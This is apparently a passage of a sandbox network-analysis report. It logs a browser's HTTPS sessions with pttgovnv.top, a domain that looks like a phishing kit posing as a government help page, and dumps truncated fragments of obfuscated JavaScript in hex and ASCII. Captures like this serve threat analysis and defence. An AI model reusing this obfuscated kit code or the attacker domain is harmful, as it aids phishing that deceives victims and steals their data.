          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bREGdFZy8MdN3CYbDDBxbUfdAx6KR9hyvz%2FGH6dGjBVF81rjmLVVL4v%2FQ%2FFdXGS%2FdMmGwZjfghZQ2llETuqSXJ7%2FYUYUjkqyHHZqGnTGYIjSB%2FWDilrWTA8jSCqfS34%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acfb0e060f83-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:21 UTC400INData Raw: 68 74 6d 6c 2c 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 69 6d 67 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 73 6f 75 72 63 65 5b 73 72 63 3d 22 64 61 74 61 3a 2c 22 5d 2c 2e 73 66 2d 68 69 64 64 65 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 64 61 72 63 75 6c 61 2d 74 65 6c 65 70 6f 72 74 2d 70 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 64 76 68 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 69 6e 70 75 74 5b 69 6e 70 75 74 6d 6f 64 65 3d 6e 75 6d 65 72 69 63 5d 2c 69 6e 70 75 74 5b 74 79 70
          Data Ascii: html,body{padding:0;border:0;margin:0}img[src="data:,"],source[src="data:,"],.sf-hidden{display:none!important}#darcula-teleport-page{position:fixed;top:0;left:0;width:100vw;height:100dvh;background-color:#fff;z-index:10}input[inputmode=numeric],input[typ


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          29192.168.2.449769172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:21 UTC554OUTGET /socket.io/?EIO=4&transport=polling&t=P6liL4Q HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Accept: */*
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:21 UTC621INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:21 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 118
          Connection: close
          Access-Control-Allow-Origin: *
          cache-control: no-store
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ow8lYvUaP6z0uOBEedpyZkUi0HriANRf5QNLRbf15QPj1%2F%2BqA4czCECEKankac1hP0nHXCompJbKAxqdzJ1HbiX%2BGbjK9Iy4FUcnAx7K5tiS2dLpz6G7GsLAnqk5hIM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acfb2961434a-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:21 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 48 4a 4e 4f 63 5a 33 55 4c 74 53 65 64 48 74 61 42 51 54 5f 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
          Data Ascii: 0{"sid":"HJNOcZ3ULtSedHtaBQT_","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          30192.168.2.449768172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:21 UTC532OUTGET /help/assets/164f9b57JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:21 UTC753INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:21 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1c1a7-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 43184
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8qRHqRmBxGsfMg9ET9qcAOUzr3SlYmP1VQT3RltfC3SbsfgSeYk2huiaZUZgJtvPexjaQddVU3UjPxjFZDcUZfHjcYbfVBFLipEJkYZd8LaqvMmWf6qVlLX05BlqmME%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acfb2f734319-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:21 UTC616INData Raw: 37 63 62 65 0d 0a 76 61 72 20 61 32 5f 30 78 34 39 30 32 34 64 3d 61 32 5f 30 78 32 30 64 63 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 33 39 38 31 34 2c 5f 30 78 31 64 31 31 38 31 29 7b 76 61 72 20 5f 30 78 34 35 37 37 38 31 3d 61 32 5f 30 78 32 30 64 63 2c 5f 30 78 32 66 35 66 39 34 3d 5f 30 78 33 33 39 38 31 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 38 37 36 30 34 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 31 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 34 32 61 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30 78 36 65 37 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 34 35 37 37 38 31 28 30
          Data Ascii: 7cbevar a2_0x49024d=a2_0x20dc;(function(_0x339814,_0x1d1181){var _0x457781=a2_0x20dc,_0x2f5f94=_0x339814();while(!![]){try{var _0x876046=parseInt(_0x457781(0x415))/0x1*(parseInt(_0x457781(0x42a))/0x2)+parseInt(_0x457781(0x6e7))/0x3*(parseInt(_0x457781(0
          2024-09-01 22:25:21 UTC1369INData Raw: 65 29 7b 5f 30 78 32 66 35 66 39 34 5b 27 70 75 73 68 27 5d 28 5f 30 78 32 66 35 66 39 34 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 5f 30 78 32 34 39 63 2c 30 78 65 35 31 65 35 29 29 3b 76 61 72 20 61 32 5f 30 78 31 63 37 61 64 66 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 63 61 37 65 66 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 38 62 32 65 2c 5f 30 78 33 62 32 61 66 30 29 7b 76 61 72 20 5f 30 78 31 65 65 36 36 63 3d 5f 30 78 31 63 61 37 65 66 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 32 38 31 64 63 62 3d 61 32 5f 30 78 32 30 64 63 3b 69 66 28 5f 30 78 33 62 32 61 66 30 29 7b 76 61 72 20 5f 30 78 32 36 34 38 30 66 3d 5f 30 78 33 62 32 61 66 30 5b 5f 30 78 32 38 31 64
          Data Ascii: e){_0x2f5f94['push'](_0x2f5f94['shift']());}}}(a2_0x249c,0xe51e5));var a2_0x1c7adf=(function(){var _0x1ca7ef=!![];return function(_0x448b2e,_0x3b2af0){var _0x1ee66c=_0x1ca7ef?function(){var _0x281dcb=a2_0x20dc;if(_0x3b2af0){var _0x26480f=_0x3b2af0[_0x281d
          2024-09-01 22:25:21 UTC1369INData Raw: 69 67 7c 43 63 65 64 69 6c 7c 45 67 72 61 76 65 7c 45 61 63 75 74 65 7c 45 63 69 72 63 7c 45 75 6d 6c 7c 49 67 72 61 76 65 7c 49 61 63 75 74 65 7c 49 63 69 72 63 7c 49 75 6d 6c 7c 45 54 48 7c 4e 74 69 6c 64 65 7c 4f 67 72 61 76 65 7c 4f 61 63 75 74 65 7c 4f 63 69 72 63 7c 4f 74 69 6c 64 65 7c 4f 75 6d 6c 7c 74 69 6d 65 73 7c 4f 73 6c 61 73 68 7c 55 67 72 61 76 65 7c 55 61 63 75 74 65 7c 55 63 69 72 63 7c 55 75 6d 6c 7c 59 61 63 75 74 65 7c 54 48 4f 52 4e 7c 73 7a 6c 69 67 7c 61 67 72 61 76 65 7c 61 61 63 75 74 65 7c 61 63 69 72 63 7c 61 74 69 6c 64 65 7c 61 75 6d 6c 7c 61 72 69 6e 67 7c 61 65 6c 69 67 7c 63 63 65 64 69 6c 7c 65 67 72 61 76 65 7c 65 61 63 75 74 65 7c 65 63 69 72 63 7c 65 75 6d 6c 7c 69 67 72 61 76 65 7c 69 61 63 75 74 65 7c 69 63 69 72 63
          Data Ascii: ig|Ccedil|Egrave|Eacute|Ecirc|Euml|Igrave|Iacute|Icirc|Iuml|ETH|Ntilde|Ograve|Oacute|Ocirc|Otilde|Ouml|times|Oslash|Ugrave|Uacute|Ucirc|Uuml|Yacute|THORN|szlig|agrave|aacute|acirc|atilde|auml|aring|aelig|ccedil|egrave|eacute|ecirc|euml|igrave|iacute|icirc
          2024-09-01 22:25:21 UTC1369INData Raw: 67 7c 74 68 6f 72 6e 7c 74 69 6d 65 73 7c 75 61 63 75 74 65 7c 75 63 69 72 63 7c 75 67 72 61 76 65 7c 75 6d 6c 7c 75 75 6d 6c 7c 79 61 63 75 74 65 7c 79 65 6e 7c 79 75 6d 6c 7c 23 5c 64 2b 7c 23 5b 78 58 5d 5b 5c 64 61 2d 66 41 2d 46 5d 2b 7c 5b 30 2d 39 61 2d 7a 41 2d 5a 5d 2b 29 3b 3f 2f 67 7d 2c 77 5b 27 6e 61 6d 65 64 52 65 66 65 72 27 2b 27 65 6e 63 65 73 27 5d 3d 7b 27 78 6d 6c 27 3a 7b 27 65 6e 74 69 74 69 65 73 27 3a 7b 27 26 6c 74 3b 27 3a 27 3c 27 2c 27 26 67 74 3b 27 3a 27 3e 27 2c 27 26 71 75 6f 74 3b 27 3a 27 5c 78 32 32 27 2c 27 26 61 70 6f 73 3b 27 3a 27 5c 78 32 37 27 2c 27 26 61 6d 70 3b 27 3a 27 26 27 7d 2c 27 63 68 61 72 61 63 74 65 72 73 27 3a 7b 27 3c 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 66 33 29 2c 27 3e 27 3a 27 26 67
          Data Ascii: g|thorn|times|uacute|ucirc|ugrave|uml|uuml|yacute|yen|yuml|#\d+|#[xX][\da-fA-F]+|[0-9a-zA-Z]+);?/g},w['namedRefer'+'ences']={'xml':{'entities':{'&lt;':'<','&gt;':'>','&quot;':'\x22','&apos;':'\x27','&amp;':'&'},'characters':{'<':a2_0x49024d(0x2f3),'>':'&g
          2024-09-01 22:25:21 UTC1369INData Raw: 3a 27 c3 83 27 2c 27 26 41 74 69 6c 64 65 3b 27 3a 27 c3 83 27 2c 27 26 41 75 6d 6c 27 3a 27 c3 84 27 2c 27 26 41 75 6d 6c 3b 27 3a 27 c3 84 27 2c 27 26 41 72 69 6e 67 27 3a 27 c3 85 27 2c 27 26 41 72 69 6e 67 3b 27 3a 27 c3 85 27 2c 27 26 41 45 6c 69 67 27 3a 27 c3 86 27 2c 27 26 41 45 6c 69 67 3b 27 3a 27 c3 86 27 2c 27 26 43 63 65 64 69 6c 27 3a 27 c3 87 27 2c 27 26 43 63 65 64 69 6c 3b 27 3a 27 c3 87 27 2c 27 26 45 67 72 61 76 65 27 3a 27 c3 88 27 2c 27 26 45 67 72 61 76 65 3b 27 3a 27 c3 88 27 2c 27 26 45 61 63 75 74 65 27 3a 27 c3 89 27 2c 27 26 45 61 63 75 74 65 3b 27 3a 27 c3 89 27 2c 27 26 45 63 69 72 63 27 3a 27 c3 8a 27 2c 27 26 45 63 69 72 63 3b 27 3a 27 c3 8a 27 2c 27 26 45 75 6d 6c 27 3a 27 c3 8b 27 2c 27 26 45 75 6d 6c 3b 27 3a 27 c3 8b 27
          Data Ascii: :'','&Atilde;':'','&Auml':'','&Auml;':'','&Aring':'','&Aring;':'','&AElig':'','&AElig;':'','&Ccedil':'','&Ccedil;':'','&Egrave':'','&Egrave;':'','&Eacute':'','&Eacute;':'','&Ecirc':'','&Ecirc;':'','&Euml':'','&Euml;':''
          2024-09-01 22:25:21 UTC1369INData Raw: 27 3a 27 c3 b1 27 2c 27 26 6f 67 72 61 76 65 27 3a 27 c3 b2 27 2c 27 26 6f 67 72 61 76 65 3b 27 3a 27 c3 b2 27 2c 27 26 6f 61 63 75 74 65 27 3a 27 c3 b3 27 2c 27 26 6f 61 63 75 74 65 3b 27 3a 27 c3 b3 27 2c 27 26 6f 63 69 72 63 27 3a 27 c3 b4 27 2c 27 26 6f 63 69 72 63 3b 27 3a 27 c3 b4 27 2c 27 26 6f 74 69 6c 64 65 27 3a 27 c3 b5 27 2c 27 26 6f 74 69 6c 64 65 3b 27 3a 27 c3 b5 27 2c 27 26 6f 75 6d 6c 27 3a 27 c3 b6 27 2c 27 26 6f 75 6d 6c 3b 27 3a 27 c3 b6 27 2c 27 26 64 69 76 69 64 65 27 3a 27 c3 b7 27 2c 27 26 64 69 76 69 64 65 3b 27 3a 27 c3 b7 27 2c 27 26 6f 73 6c 61 73 68 27 3a 27 c3 b8 27 2c 27 26 6f 73 6c 61 73 68 3b 27 3a 27 c3 b8 27 2c 27 26 75 67 72 61 76 65 27 3a 27 c3 b9 27 2c 27 26 75 67 72 61 76 65 3b 27 3a 27 c3 b9 27 2c 27 26 75 61 63 75
          Data Ascii: ':'','&ograve':'','&ograve;':'','&oacute':'','&oacute;':'','&ocirc':'','&ocirc;':'','&otilde':'','&otilde;':'','&ouml':'','&ouml;':'','&divide':'','&divide;':'','&oslash':'','&oslash;':'','&ugrave':'','&ugrave;':'','&uacu
          2024-09-01 22:25:21 UTC1369INData Raw: 61 3b 27 3a 27 ce b4 27 2c 27 26 65 70 73 69 6c 6f 6e 3b 27 3a 27 ce b5 27 2c 27 26 7a 65 74 61 3b 27 3a 27 ce b6 27 2c 27 26 65 74 61 3b 27 3a 27 ce b7 27 2c 27 26 74 68 65 74 61 3b 27 3a 27 ce b8 27 2c 27 26 69 6f 74 61 3b 27 3a 27 ce b9 27 2c 27 26 6b 61 70 70 61 3b 27 3a 27 ce ba 27 2c 27 26 6c 61 6d 62 64 61 3b 27 3a 27 ce bb 27 2c 27 26 6d 75 3b 27 3a 27 ce bc 27 2c 27 26 6e 75 3b 27 3a 27 ce bd 27 2c 27 26 78 69 3b 27 3a 27 ce be 27 2c 27 26 6f 6d 69 63 72 6f 6e 3b 27 3a 27 ce bf 27 2c 27 26 70 69 3b 27 3a 27 cf 80 27 2c 27 26 72 68 6f 3b 27 3a 27 cf 81 27 2c 27 26 73 69 67 6d 61 66 3b 27 3a 27 cf 82 27 2c 27 26 73 69 67 6d 61 3b 27 3a 27 cf 83 27 2c 27 26 74 61 75 3b 27 3a 27 cf 84 27 2c 27 26 75 70 73 69 6c 6f 6e 3b 27 3a 27 cf 85 27 2c 27 26 70
          Data Ascii: a;':'','&epsilon;':'','&zeta;':'','&eta;':'','&theta;':'','&iota;':'','&kappa;':'','&lambda;':'','&mu;':'','&nu;':'','&xi;':'','&omicron;':'','&pi;':'','&rho;':'','&sigmaf;':'','&sigma;':'','&tau;':'','&upsilon;':'','&p
          2024-09-01 22:25:21 UTC1369INData Raw: 27 e2 97 8a 27 2c 27 26 73 70 61 64 65 73 3b 27 3a 27 e2 99 a0 27 2c 27 26 63 6c 75 62 73 3b 27 3a 27 e2 99 a3 27 2c 27 26 68 65 61 72 74 73 3b 27 3a 27 e2 99 a5 27 2c 27 26 64 69 61 6d 73 3b 27 3a 27 e2 99 a6 27 7d 2c 27 63 68 61 72 61 63 74 65 72 73 27 3a 7b 27 5c 78 32 37 27 3a 27 26 61 70 6f 73 3b 27 2c 27 5c 75 30 30 61 30 27 3a 27 26 6e 62 73 70 3b 27 2c 27 c2 a1 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 31 34 29 2c 27 c2 a2 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 33 37 29 2c 27 c2 a3 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 39 39 29 2c 27 c2 a4 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 37 31 29 2c 27 c2 a5 27 3a 27 26 79 65 6e 3b 27 2c 27 c2 a6 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 66 66 29 2c 27
          Data Ascii: '','&spades;':'','&clubs;':'','&hearts;':'','&diams;':''},'characters':{'\x27':'&apos;','\u00a0':'&nbsp;','':a2_0x49024d(0x314),'':a2_0x49024d(0x537),'':a2_0x49024d(0x699),'':a2_0x49024d(0x371),'':'&yen;','':a2_0x49024d(0x2ff),'
          2024-09-01 22:25:21 UTC1369INData Raw: 75 74 65 3b 27 2c 27 c3 9b 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 61 39 29 2c 27 c3 9c 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 65 65 29 2c 27 c3 9d 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 64 65 29 2c 27 c3 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 65 34 29 2c 27 c3 9f 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 30 38 29 2c 27 c3 a0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 63 39 29 2c 27 c3 a1 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 65 38 29 2c 27 c3 a2 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 33 34 64 29 2c 27 c3 a3 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 36 39 29 2c 27 c3 a4 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 36 32 63 29 2c 27 c3 a5 27 3a 61 32 5f 30
          Data Ascii: ute;','':a2_0x49024d(0x2a9),'':a2_0x49024d(0x2ee),'':a2_0x49024d(0x6de),'':a2_0x49024d(0x5e4),'':a2_0x49024d(0x308),'':a2_0x49024d(0x5c9),'':a2_0x49024d(0x3e8),'':a2_0x49024d(0x34d),'':a2_0x49024d(0x569),'':a2_0x49024d(0x62c),'':a2_0
          2024-09-01 22:25:21 UTC1369INData Raw: 27 e2 80 9c 27 3a 27 26 6c 64 71 75 6f 3b 27 2c 27 e2 80 9d 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 32 61 29 2c 27 e2 80 9e 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 38 35 29 2c 27 e2 80 a0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 31 62 32 29 2c 27 e2 80 a1 27 3a 27 26 44 61 67 67 65 72 3b 27 2c 27 e2 80 b0 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 32 30 61 29 2c 27 e2 80 b9 27 3a 27 26 6c 73 61 71 75 6f 3b 27 2c 27 e2 80 ba 27 3a 27 26 72 73 61 71 75 6f 3b 27 2c 27 e2 82 ac 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 31 64 38 29 2c 27 c6 92 27 3a 27 26 66 6e 6f 66 3b 27 2c 27 ce 91 27 3a 61 32 5f 30 78 34 39 30 32 34 64 28 30 78 35 32 33 29 2c 27 ce 92 27 3a 27 26 42 65 74 61 3b 27 2c 27 ce 93 27 3a 61 32 5f 30 78 34
          Data Ascii: '':'&ldquo;','':a2_0x49024d(0x22a),'':a2_0x49024d(0x285),'':a2_0x49024d(0x1b2),'':'&Dagger;','':a2_0x49024d(0x20a),'':'&lsaquo;','':'&rsaquo;','':a2_0x49024d(0x1d8),'':'&fnof;','':a2_0x49024d(0x523),'':'&Beta;','':a2_0x4


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          31192.168.2.449770104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:21 UTC368OUTGET /api/MC4zMDIxMDgwNzc2NjI2MDU5NA== HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:21 UTC575INHTTP/1.1 404 Not Found
          Date: Sun, 01 Sep 2024 22:25:21 GMT
          Transfer-Encoding: chunked
          Connection: close
          Access-Control-Allow-Origin: *
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZ%2BvZmJal%2Fiwbtd5ooJ2LwDJoBvEsV%2F18E9do5HzNHBoHTcAkMlvZZgRFYrRUq8a13PZOk2zOmlvM87fMHsK5jeiwwxP%2FD49sGVB9aBSVwze6%2BEa0yhJsn%2BVc2ki4VY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acfba9928c59-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:21 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          32192.168.2.449771104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:21 UTC364OUTGET /help/assets/0e738ae1JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:21 UTC746INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:21 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"1b7a6-18fc3d84650"
          CF-Cache-Status: MISS
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wpy1qqZnvIB7BXNMyouxy0c3k7XDDAa1UNXScSKvAzG63%2ByLqMhrBLUerFl6tnalI%2BmfRzBi5F0VI9K8Eg04bfN4L8mXVOXPrwX9wPT4g6G3YgpFg6nVZzzM9s59Qj4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acfbcb2f42b9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:21 UTC623INData Raw: 37 63 63 36 0d 0a 63 6f 6e 73 74 20 61 31 5f 30 78 35 34 31 34 36 61 3d 61 31 5f 30 78 31 61 33 33 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 30 31 39 61 2c 5f 30 78 34 62 64 31 65 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 61 64 31 34 66 3d 61 31 5f 30 78 31 61 33 33 2c 5f 30 78 34 66 30 39 64 66 3d 5f 30 78 31 35 30 31 39 61 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 33 61 65 64 36 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 63 30 29 29 2f 30 78 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 64 32 29 29 2f 30 78 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 34 61 64 31 34 66 28 30 78 31 65 31 29 29 2f 30 78 33 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78
          Data Ascii: 7cc6const a1_0x54146a=a1_0x1a33;(function(_0x15019a,_0x4bd1ef){const _0x4ad14f=a1_0x1a33,_0x4f09df=_0x15019a();while(!![]){try{const _0x23aed6=parseInt(_0x4ad14f(0x1c0))/0x1*(-parseInt(_0x4ad14f(0x1d2))/0x2)+-parseInt(_0x4ad14f(0x1e1))/0x3*(parseInt(_0x
          2024-09-01 22:25:21 UTC1369INData Raw: 20 5f 30 78 32 64 30 33 63 33 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 37 64 66 66 39 63 2c 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 64 32 39 37 63 3d 5f 30 78 32 64 30 33 63 33 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 35 33 30 37 31 3d 61 31 5f 30 78 31 61 33 33 3b 69 66 28 5f 30 78 35 32 65 33 63 38 29 7b 63 6f 6e 73 74 20 5f 30 78 33 33 32 37 36 66 3d 5f 30 78 35 32 65 33 63 38 5b 5f 30 78 31 35 33 30 37 31 28 30 78 33 36 64 29 5d 28 5f 30 78 37 64 66 66 39 63 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 32 65 33 63 38 3d 6e 75 6c 6c 2c 5f 30 78 33 33 32 37 36 66 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 64
          Data Ascii: _0x2d03c3=!![];return function(_0x7dff9c,_0x52e3c8){const _0x3d297c=_0x2d03c3?function(){const _0x153071=a1_0x1a33;if(_0x52e3c8){const _0x33276f=_0x52e3c8[_0x153071(0x36d)](_0x7dff9c,arguments);return _0x52e3c8=null,_0x33276f;}}:function(){};return _0x2d
          2024-09-01 22:25:21 UTC1369INData Raw: 3e 74 79 70 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 31 64 29 5d 3d 3d 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 33 38 37 29 3f 41 72 72 61 79 42 75 66 66 65 72 5b 27 69 73 56 69 65 77 27 5d 28 5f 30 78 32 31 35 61 66 64 29 3a 5f 30 78 32 31 35 61 66 64 26 26 5f 30 78 32 31 35 61 66 64 5b 61 31 5f 30 78 35 34 31 34 36 61 28 30 78 31 36 32 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 2c 65 65 3d 28 7b 74 79 70 65 3a 5f 30 78 32 64 38 37 61 62 2c 64 61 74 61 3a 5f 30 78 33 62 36 30 65 31 7d 2c 5f 30 78 34 64 30 35 38 31 2c 5f 30 78 34 36 62 61 62 32 29 3d 3e 41 65 26 26 5f 30 78 33 62 36 30 65 31 20 69 6e 73 74 61 6e 63 65 6f 66 20 42 6c 6f 62 3f 5f 30 78 34 64 30 35 38 31 3f 5f
